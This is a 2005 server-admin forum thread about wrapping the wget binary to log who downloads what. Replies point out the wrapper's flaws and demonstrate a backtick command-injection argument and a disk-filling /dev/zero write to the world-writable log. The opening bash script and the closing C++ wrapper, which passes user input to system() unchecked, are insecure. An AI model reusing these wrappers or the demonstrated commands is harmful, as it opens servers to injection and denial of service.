Results 1 to 17 of 17
  1. #1
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681

    Log Wget Commands

    Logging wget commands is a simple proccess. Remember you will have to set permissions on binarys along with the directory. You dont want people looking to see what the new file is called. Generally, this is a excellent way to pickup problems, due to the fact most attacks now adays are automated and do not put in place checks.

    What this simple but useful script does, is first you move the wget binary to a new file name, you extra security you can even move it to a completely different directory. Please remember your wget path will be different, from distro to distro, get the path by typing `whereis wget`

    Now, lets move our wget to a new name, for this example I choose ekigrowbwo. For my specific distro wget is located in /usr/bin/wget

    To move it we use the mv command, for more information on this command please read the man page, `man mv`

    mv /usr/bin/wget /usr/bin/ekigrowbwo

    This renames wget to /usr/bin/ekigrowbwo , now all we have to do is create our own wget script, so just open it up with pico,
    pico /usr/bin/wget

    Now place this simple script inside

    #!/bin/bash
    ME=`whoami`
    TIME=`date`
    DIR=`pwd`
    echo "$TIME - $ME - $1 - >> $DIR" >> /usr/bin/wget.log
    /usr/bin/ekigrowbwo $1

    and save and exit(ctrl+x)

    Now you should have a simple script in your wget binary. Now create the log file, in the script it logs too /usr/bin/wget.log just create that with the touch command.

    touch /usr/bin/wget.log

    That is you all done, you have now created a simple yet effective wget script, Test it by typing `wget http://www.google.com`, then `cat /usr/bin/wget` , you should see what was downloaded, when, where and by whom.

    I hope this helps you.
    -Written by HostGeekZ.com
    http://www.hostgeekz.com/guides/cPan...t_Commands.htm
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  2. #2
    Excellent! Thanks very much for this. I have been spending a lot of time in log files among other things trying to find out who might be using the wget command. I also wish there was an easier way to find out where junk comes from found in the tmp folder.

    Thanks again and I'll give this a try.

  3. #3
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    Most of the "junk" found in /tmp is from webshells now adays.

    Just get the file name, go to your apache logs directory. cPanel users this is in /usr/local/apache/domlogs.

    Just
    cat * | grep filename

    Then you have what they exploited and what was "wgeted"
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  4. #4
    Join Date
    Jul 2005
    Posts
    67
    I really feel kind of bad pointing this out, but that doesn't stop anyone from uploading their own copy of wget and running it in their own home directory. It most definitely doesn't stop users from connecting to remote servers via CGI scripts or local applications. Additionally, there are a plethora of other commands that have "wget functionality." For example, fetch, ncftp, and the lynx text browser with the correct "just dump it here" flags.

    Additionally, the 'wget' program runs as the user executing it. This means that any log file you create is going to have to be world writable. Once that's done, there is nothing stopping *any* user from simply removing that file (never mind the fact that the wget wrapper is by nature world readable).

    Limiting the command is superficial. The real goal should be hardening the system to the point that it doesn't matter *what* they download.

    If anyone is really interested in logging commands that are run by users, look into standard Unix process logging.

  5. #5
    Join Date
    Oct 2003
    Posts
    570
    Additionally the script quoted above effectively strips all parameters passed to wget but the first one. Actually there's no need for uploading your own wget binary, since the location of the "true" binary is easily viewable (since the script needs to be +r since the bash interpreter running with the user rights needs to parse it).

    Calling the renaming of a binary a "security measure" is quite a perversion of the term, by the way.

    Actually you would reach quite the opposite, since your users would be given permission to corrupt your server by filling up your /usr partition with crap, since, as mentioned before, the log file would have to be world writable.

    Try

    cp /dev/zero /usr/bin/wget.log

    and wait a few minutes to see what I mean ;-).

    By the way, deleting the file wouldn't be possible for users but nothing would prevent them from overwriting it with /dev/null as opposed to /dev/zero ;-).

    If you found a way to let your script run as a different user it would make things even worse since there are no input checks. So, passing commands in backticks would allow you to execute random commands with the script's full user rights.

    Like

    yourscript "`cd $HOME >/dev/null; ls -l >/tmp/foo.bar; chmod 666 /tmp/foo.bar >/dev/null`"

    The "script" wouldn't even log anything in that case, since the above does not generate any output on STDOUT.

    Edit: Just saw that the "script author" is actually offering hosting and is even displaying this so called "guide" on his page. Did I miss something? Is all of this part of some kind of kiddie host joke?
    Last edited by aldee; 07-10-2005 at 01:27 PM.

  6. #6
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    Firstly, I am not a host.

    Second I clearly stated that it is not very good.

    Instead of all your lame ***, attempts at trying to go on about what it actualy does I also clearly state and I quote.

    due to the fact most attacks now adays are automated and do not put in place checks.
    Where on earth does it say, running this will keep your server secure? Go on tell me.

    "Did I miss something? Is all of this part of some kind of kiddie host joke?"

    Again I state I am not a host. Nor do I even offer any sort of webhosting. So get your facts right, you are clearly stupid if you thought it was a webhost, to put it blunt.

    It was one of the ways to pickup the r0nin exploit especailly quickly without checking apache logs.

    So you try to come into a thread, rant about things I never stated it will do, for what? To think you know everything?

    Quite frankly, I do not appreciate your comments because I have never once stated it will do much, it is also clearly stated that it is for automated attempts.

    So infuture read what was said before going on your idiotic rants.

    -Scott
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  7. #7
    Join Date
    Oct 2003
    Posts
    570
    The point is not that it doesn't secure your sever, it is that it's opening your server up to DoS attacks from local users (or compromised user accounts) by granting them permission to fill up your /usr partition and that it's crippling the usage of wget for legitimate users since $1 - as opposed to $* - only contains the first command line parameter passed on to the script.

    Posting something like this in a forum that might be read by people who could potentially make use of the script is grossly negligent.

    And frankly, I did not comment on this thread to earn your appreciation.

    EOD as far as I am concerned.

  8. #8
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    It does not open permissions to the full user partion.

    It clearly states 1 and I repeat 1!! log file.

    It only logs the first string because if you ever look at whats passes threw, 90% of the time it is 1 string, nothing more. You can add it to read all strings if you wish but very rarly will you find automatic srings with switches and more that 1 url.

    -Scott
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  9. #9
    Join Date
    Jul 2005
    Posts
    67
    HG - his point is this..

    cat /dev/zero >> /usr/bin/wget.log... that command, by any user, would fill up the /usr partition. Depending on how you have your system configured, it could fill up your entire drive. Watch:

    [root@marvin jeff]# touch /usr/bin/wget.log
    [root@marvin jeff]# chmod 777 /usr/bin/wget.log
    [root@marvin jeff]# exit
    [jeff@marvin ~]$ id
    uid=500(jeff) gid=500(jeff) groups=500(jeff) context=user_uystem_r:unconfined_ t
    [jeff@marvin ~]$ date
    Sun Jul 10 17:50:55 EDT 2005
    [jeff@marvin ~]$ ls -al /usr/bin/wget.log
    -rwxrwxrwx 1 root root 0 Jul 10 17:50 /usr/bin/wget.log
    [jeff@marvin ~]$ cat /dev/zero > /usr/bin/wget.log

    [jeff@marvin ~]$ ls -alh /usr/bin/wget.log
    -rwxrwxrwx 1 root root 341M Jul 10 17:51 /usr/bin/wget.log
    [jeff@marvin ~]$ date
    Sun Jul 10 17:51:17 EDT 2005
    [jeff@marvin ~]$

    The point is that by adding the logging functionality, you're at the same time opening a bigger hole. While someone MIGHT take your machine offline by something they bring down the HTTP, they *WILL* take your machine offline if they can fill up your file systems.

    By not accepting more than one command, you'll almost guarentee that users will find your script. If a user passes a flag to wget and gets a strange error, they're going to explore that a bit.

    I'm not attacking you, I just want to make sure it's clear that individuals following this tip might be setting themselves up for some pain without realizing it.

    If execution logging is important to you, look into process logging.

    Look, it's great that you want to help out a community. Many folks could care less. But be aware that *many* people will following what you've typed up verbatim and they will take what you say as gospel. Especially when you run a site full of tips and tutorials.

    -Jeff

  10. #10
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    I understand what you are talking about, but you still all miss the basic point of it. I was somthing I wrote while typing out as it was just a crap idea I had at the time, just like the rest of the guides I make.

    Its for automated attempts. You say they can just fill up the partion, well if someone has access, i'm afraid they are going to do alot worse than that anyway. Not to mention, caI have never ONCE saw anyone look at /usr/bin/wget or the relivent path.
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  11. #11
    Join Date
    Jul 2005
    Posts
    67
    Then, please, do everyone a favor and ensure you mention that there are inherent risks with doing this type of thing this way.

  12. #12
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    You say that now. Look at alot of things around here, there are ALWAYS risks.

    It just depends on how you deal with it.
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  13. #13
    Join Date
    Jul 2005
    Posts
    67
    I'm not going to bicker back and forth with you. I've made every effort to point out issues I've seen in your work with a very high level of respect. It wasn't me that replied in an agressive manner.

    The bottom line here is you are doing a disservice to the hosting community by taking an authoritative stance on a topic and dispursing misleading information. If you're comfortable taking that approach, I'm comfortable with letting you do it.

  14. #14
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    I have read over what I have been saying, I do not mean to come across like that. Although I have been like it all day for some reason.

    I totaly understand what you are saying, but I am too stuborne too agree with you 100%, because I have my own point of view.

    I guess its up to the person to decide.

    -Scott
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  15. #15
    Join Date
    Apr 2003
    Location
    UK
    Posts
    2,569
    a better more foolproof way is to use a kernel level tool such as grsec to log execution, and run something like "grep wget messages" to get teh wget commands from the log

  16. #16
    Join Date
    Jun 2003
    Posts
    976
    what about using logger+syslogd for logging instead of own logging system? it should at least prevent users from filling up the log file, read/write access is prohibited and syslogd does some input throttling
    Code:
    #!/bin/bash
    /bin/logger -t wget -p local0.notice -- $LOGNAME/$UID - $PWD : $*
    /usr/bin/wget $*
    create log file
    Code:
    touch /var/log/wget
    chmod 640 /var/log/wget
    and add
    Code:
    local0.notice                           -/var/log/wget
    to /etc/syslog.conf or equivalent file

  17. #17

    would something like this be ok?

    #include <stdio.h>
    #include <sys/types.h>
    #include <unistd.h>
    #include <fstream.h>
    #include <iostream.h>
    #include <time.h>
    #include <pwd.h>
    #include <unistd.h>
    #include <string>
    #include <stdlib.h>

    int main(int nArg, char* pszArgs[])
    {
    ifstream fin;// File Pointers
    ofstream fout;
    using namespace std;


    string myCommand = "xwgt";
    char cwd[260];
    getcwd(cwd,260);


    time_t tim=time(NULL);
    char *curTime=ctime(&tim);
    curTime[strlen(curTime)-1]=0;

    struct passwd *pwd; char *username = NULL; if (pwd = getpwuid(getuid())) { username = pwd->pw_name; } else { perror("onoes!"); }

    string logStr;
    logStr = curTime;
    logStr += " user[";
    logStr += username;
    logStr += " cwd[";
    logStr += cwd;
    logStr += "] ";

    for(int i=1;i<=2;i++)
    {
    if(pszArgs[i]) {
    myCommand += " ";
    myCommand += pszArgs[i];
    }
    }



    FILE * pFile;
    pFile = fopen ("/var/log/wget","at");
    if (pFile!=NULL)
    {
    fputs (logStr.c_str(),pFile);
    fputs (myCommand.c_str(),pFile);
    fputs ("\n",pFile);
    fclose (pFile);
    }


    system(myCommand.c_str());
    }

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •